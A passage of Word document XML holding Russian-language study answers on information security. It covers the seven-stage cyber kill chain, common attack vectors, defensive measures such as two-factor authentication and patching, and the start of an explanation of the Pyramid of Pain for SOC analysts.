    </w:p>
    <w:p w14:paraId="4F1DD1AB" w14:textId="77777777" w:rsidR="005604B7" w:rsidRDefault="005604B7" w:rsidP="00D2670E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="246AA595" w14:textId="2A1D7DD6" w:rsidR="005604B7" w:rsidRDefault="005604B7" w:rsidP="005604B7">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="005604B7">
        <w:t>Первоначальная модель цепочки кибер-убийств содержала семь последовательных шагов:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487147B1" w14:textId="0F89DB8E" w:rsidR="005604B7" w:rsidRDefault="005604B7" w:rsidP="005604B7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005604B7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Reconnaissance (разведка)</w:t>
      </w:r>
      <w:r w:rsidRPr="005604B7">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidRPr="005604B7">
        <w:t>лоумышленник выбирает цель, исследует ее и пытается выявить уязвимости в целевой сети.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B8A171" w14:textId="73D69659" w:rsidR="005604B7" w:rsidRDefault="005604B7" w:rsidP="005604B7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005604B7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Weaponization (вооружение):</w:t>
      </w:r>
      <w:r w:rsidRPr="005604B7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidRPr="005604B7">
        <w:t>лоумышленник создает вредоносное программное обеспечение удаленного доступа, такое как вирус или червь, адаптированное к одной или нескольким уязвимостям.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A52BFC8" w14:textId="51D589D2" w:rsidR="005604B7" w:rsidRDefault="005604B7" w:rsidP="005604B7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005604B7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Delivery (доставка): </w:t>
      </w:r>
      <w:r>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidRPr="005604B7">
        <w:t>лоумышленник передает</w:t>
      </w:r>
      <w:r w:rsidR="00451423">
        <w:t xml:space="preserve"> вредоносное</w:t>
      </w:r>
      <w:r w:rsidRPr="005604B7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ПО</w:t>
      </w:r>
      <w:r w:rsidRPr="005604B7">
        <w:t xml:space="preserve"> цели (например, через вложения электронной почты, веб-сайты или USB-накопители).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08152CB6" w14:textId="406A6F6D" w:rsidR="00451423" w:rsidRDefault="00451423" w:rsidP="00451423">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451423">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Exploitation (эксплуатация</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> уязвимости</w:t>
      </w:r>
      <w:r w:rsidRPr="00451423">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r w:rsidRPr="00451423">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="00451423">
        <w:t>рабатыв</w:t>
      </w:r>
      <w:r>
        <w:t>ает программный код вредоноса</w:t>
      </w:r>
      <w:r w:rsidRPr="00451423">
        <w:t>, который предпринимает действия в целевой сети для использования уязвимости.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351FF6F0" w14:textId="468FB2D0" w:rsidR="00451423" w:rsidRDefault="00451423" w:rsidP="00451423">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451423">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Installation (внедрение):</w:t>
      </w:r>
      <w:r w:rsidRPr="00451423">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00451423">
        <w:t>редоносное ПО устанавливает точку доступа (например, «backdoor»), которую может использовать злоумышленник.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CB9EEC" w14:textId="608EFA36" w:rsidR="00451423" w:rsidRDefault="00451423" w:rsidP="00451423">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451423">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Command and Control (получение управления):</w:t>
      </w:r>
      <w:r w:rsidRPr="00451423">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00451423">
        <w:t>редоносное ПО позволяет злоумышленнику иметь постоянный доступ «hands on the keyboard» к целевой сети.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6821D0CB" w14:textId="09504674" w:rsidR="002307FF" w:rsidRDefault="002307FF" w:rsidP="002307FF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002307FF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Actions on Objective (выполнение действий у жертвы):</w:t>
      </w:r>
      <w:r w:rsidRPr="002307FF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidRPr="002307FF">
        <w:t>лоумышленник предпринимает действия для достижения своих целей, такие как кража данных, уничтожение данных или шифрование с целью выкупа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C92E0E" w14:textId="77777777" w:rsidR="002307FF" w:rsidRPr="00395645" w:rsidRDefault="002307FF" w:rsidP="002307FF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67AB81E4" w14:textId="50113FCB" w:rsidR="002307FF" w:rsidRPr="002307FF" w:rsidRDefault="002307FF" w:rsidP="00395645">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00395645">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kill</w:t>
      </w:r>
      <w:r w:rsidRPr="002307FF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00395645">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chain</w:t>
      </w:r>
      <w:r w:rsidRPr="002307FF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>сегодня</w:t>
      </w:r>
      <w:r w:rsidRPr="002307FF">
        <w:t xml:space="preserve"> гораздо менее предсказуем</w:t>
      </w:r>
      <w:r>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="002307FF">
        <w:t xml:space="preserve"> и четко определен</w:t>
      </w:r>
      <w:r>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="002307FF">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> т.к. </w:t>
      </w:r>
      <w:r w:rsidRPr="002307FF">
        <w:t>злоумышленники нередко пропускают или объединяют этапы, особенно в первой половине жизненного цикла.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD67461" w14:textId="65B5D204" w:rsidR="005604B7" w:rsidRDefault="002307FF" w:rsidP="002307FF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>######################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B46C217" w14:textId="77777777" w:rsidR="001C0D05" w:rsidRPr="002307FF" w:rsidRDefault="001C0D05" w:rsidP="002307FF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7636A4E7" w14:textId="4580408F" w:rsidR="00755D9E" w:rsidRDefault="00755D9E" w:rsidP="00587ED5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Как вы считаете, какие из векторов атак наиболее распространены</w:t>
      </w:r>
      <w:r w:rsidR="00D374B8">
        <w:t xml:space="preserve"> и почему</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64399041" w14:textId="09FE8915" w:rsidR="002307FF" w:rsidRPr="001C0D05" w:rsidRDefault="002307FF" w:rsidP="002307FF"/>
    <w:p w14:paraId="062F3877" w14:textId="5D1FB9FF" w:rsidR="002307FF" w:rsidRPr="00395645" w:rsidRDefault="002307FF" w:rsidP="002307FF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Ответ</w:t>
      </w:r>
      <w:r w:rsidRPr="00395645">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0B0A1E" w14:textId="5FA106EE" w:rsidR="002307FF" w:rsidRDefault="0026596C" w:rsidP="002307FF">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0026596C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Фишинг</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0026596C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">При фишинге </w:t>
      </w:r>
      <w:r w:rsidRPr="0026596C">
        <w:t>злоумышленник обычно выдает</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> себя за н</w:t>
      </w:r>
      <w:r w:rsidR="00931174">
        <w:t>астоящую организацию/сотрудника</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с целью получения конфиденциальных данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D66C5D1" w14:textId="59D7DD1C" w:rsidR="00076886" w:rsidRDefault="00076886" w:rsidP="00076886">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00076886">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вредоносное ПО</w:t>
      </w:r>
      <w:r w:rsidRPr="00076886">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>При посещении сайтов можно наткнуться на вредоносные ссылки или файлы, которые в лучшем случае перенесут/заразят рекламным ПО, а в худшем – стать частью ботнета или майнинговой фермы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70516197" w14:textId="608BE3AF" w:rsidR="005508A3" w:rsidRPr="00076886" w:rsidRDefault="00076886" w:rsidP="005508A3">
      <w:r w:rsidRPr="00076886">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Атаки грубой силы</w:t>
      </w:r>
      <w:r>
        <w:t>. При создании слабых паролей</w:t>
      </w:r>
      <w:r w:rsidR="005508A3">
        <w:t xml:space="preserve"> можно быстро потерять свой аккаунт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCA8553" w14:textId="184CA42A" w:rsidR="00076886" w:rsidRDefault="005508A3" w:rsidP="002307FF">
      <w:r>
        <w:t xml:space="preserve">Эти атаки распространены, потому что население не </w:t>
      </w:r>
      <w:r w:rsidR="003D089B">
        <w:t>образовано в плане</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D089B">
        <w:t>ИБ</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B4FC1C" w14:textId="3630B8A2" w:rsidR="005508A3" w:rsidRDefault="00931174" w:rsidP="00931174">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>######################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0627E07E" w14:textId="77777777" w:rsidR="001C0D05" w:rsidRPr="00931174" w:rsidRDefault="001C0D05" w:rsidP="00931174">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29613246" w14:textId="3F93C51B" w:rsidR="00755D9E" w:rsidRDefault="00587ED5" w:rsidP="00587ED5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Какие меры противодействия атак вы знаете?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344C64CF" w14:textId="77777777" w:rsidR="000C4808" w:rsidRDefault="000C4808" w:rsidP="000C4808">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66AF0AEB" w14:textId="0BE47AF8" w:rsidR="000C4808" w:rsidRPr="00395645" w:rsidRDefault="000C4808" w:rsidP="000C4808">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Ответ</w:t>
      </w:r>
      <w:r w:rsidRPr="00395645">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A58200" w14:textId="46871E20" w:rsidR="00931174" w:rsidRDefault="003D089B" w:rsidP="00931174">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Обучение персонала;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489B8851" w14:textId="0D3DEFD7" w:rsidR="003D089B" w:rsidRDefault="003D089B" w:rsidP="00931174">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Использовать</w:t>
      </w:r>
      <w:r w:rsidRPr="003D089B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> разные учетные записи и пароли для доступа к различным ресурсам;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C26C195" w14:textId="2596ECAE" w:rsidR="003D089B" w:rsidRDefault="003D089B" w:rsidP="00931174">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Не хранить</w:t>
      </w:r>
      <w:r w:rsidRPr="003D089B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> чувствительную информацию в открытом виде или в открытом доступе</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A02A262" w14:textId="07C04C20" w:rsidR="003D089B" w:rsidRDefault="003D089B" w:rsidP="00931174">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Минимизировать </w:t>
      </w:r>
      <w:r w:rsidRPr="003D089B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>привилегии пользователей и служб;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77350E82" w14:textId="7FE68FA0" w:rsidR="003D089B" w:rsidRDefault="003D089B" w:rsidP="00931174">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidRPr="003D089B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>рименяйте двухфакторную аутентификацию</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BCB988" w14:textId="10B24E3D" w:rsidR="003D089B" w:rsidRDefault="003D089B" w:rsidP="00931174">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Использовать а</w:t>
      </w:r>
      <w:r w:rsidRPr="003D089B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>втоматизированные средства анализа защищенности и выявления уязвимостей в ПО</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23703954" w14:textId="60AC6A04" w:rsidR="003D089B" w:rsidRDefault="003D089B" w:rsidP="00931174">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Сменить</w:t>
      </w:r>
      <w:r w:rsidRPr="003D089B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> стандартные пароли на новые</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC7CDAC" w14:textId="07F411BD" w:rsidR="003D089B" w:rsidRDefault="003D089B" w:rsidP="00931174">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Применять</w:t>
      </w:r>
      <w:r w:rsidRPr="003D089B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> парольную политику, предусматривающую строгие требования к минимальной длине и сложности паролей;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39592E0B" w14:textId="3C9D6E0F" w:rsidR="003D089B" w:rsidRDefault="0014303D" w:rsidP="00931174">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>О</w:t>
      </w:r>
      <w:r w:rsidR="003A29A4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>граничить</w:t>
      </w:r>
      <w:r w:rsidRPr="0014303D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> срок использования паролей</w:t>
      </w:r>
      <w:r w:rsidR="003A29A4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (не всегда возможно это осуществить)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434AF27A" w14:textId="0E8BF90B" w:rsidR="0014303D" w:rsidRDefault="003A29A4" w:rsidP="00931174">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Обновлять</w:t>
      </w:r>
      <w:r w:rsidRPr="003A29A4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> используемое ПО</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADDE10E" w14:textId="5C042D9F" w:rsidR="003A29A4" w:rsidRDefault="003A29A4" w:rsidP="00931174">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Использовать антивирус и другие системы безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB988CE" w14:textId="05B8C3CB" w:rsidR="003D089B" w:rsidRDefault="001C0D05" w:rsidP="001C0D05">
      <w:pPr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####################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3C00DD" w14:textId="77777777" w:rsidR="001C0D05" w:rsidRPr="001C0D05" w:rsidRDefault="001C0D05" w:rsidP="001C0D05">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10D260C1" w14:textId="4A53DD8B" w:rsidR="00587ED5" w:rsidRDefault="00955991" w:rsidP="00587ED5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Что такое пирамида боли и как её можно использовать</w:t>
      </w:r>
      <w:r w:rsidR="00B735FA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> в рамках деятельности </w:t>
      </w:r>
      <w:r w:rsidR="00B735FA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SOC</w:t>
      </w:r>
      <w:r w:rsidR="00E04296">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E670174" w14:textId="20AF7E75" w:rsidR="001C0D05" w:rsidRDefault="001C0D05" w:rsidP="001C0D05">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="079314A4" w14:textId="5D7765AD" w:rsidR="001C0D05" w:rsidRPr="001C0D05" w:rsidRDefault="001C0D05" w:rsidP="001C0D05">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Ответ</w:t>
      </w:r>
      <w:r w:rsidRPr="001C0D05">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747968B8" w14:textId="504B218B" w:rsidR="001C0D05" w:rsidRDefault="001C0D05" w:rsidP="001C0D05">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Пирамида боли –</w:t>
      </w:r>
      <w:r w:rsidRPr="001C0D05">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> это </w:t>
      </w:r>
      <w:r w:rsidR="00EF4857">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>модель</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="001C0D05">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> которая классифицирует различные ти</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>пы индикаторов компрометации (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Io</w:t>
      </w:r>
      <w:r w:rsidRPr="001C0D05">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C0D05">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">) по уровню сложности изменения для злоумышленников. Эта модель помогает аналитикам информационной безопасности и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SOC</w:t>
      </w:r>
      <w:r w:rsidRPr="001C0D05">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> оценивать эффективно</w:t>
      </w:r>
      <w:r w:rsidR="00EF4857">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">сть используемых средств защиты, </w:t>
      </w:r>
      <w:r w:rsidR="00EF4857" w:rsidRPr="00EF4857">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>обеспечивает системный подход к в</w:t>
      </w:r>
      <w:r w:rsidR="00EF4857">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ыявлению и блокировке угроз, также </w:t>
      </w:r>
      <w:r w:rsidR="00EF4857" w:rsidRPr="00EF4857">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>позволяет определить, на какие индикаторы стоит обратить внимание в первую очередь, какие из них дороже и сложнее для злоумышленников изменить, и тем самым определить наиболее эффективные методы защиты.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D52ADCE" w14:textId="17E2AFA6" w:rsidR="00EF4857" w:rsidRDefault="00EF4857" w:rsidP="001C0D05">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E7937DD" w14:textId="3C86C151" w:rsidR="00EF4857" w:rsidRPr="00395645" w:rsidRDefault="00EF4857" w:rsidP="001C0D05">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Уровни пирамиды</w:t>
      </w:r>
      <w:r w:rsidRPr="00395645">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
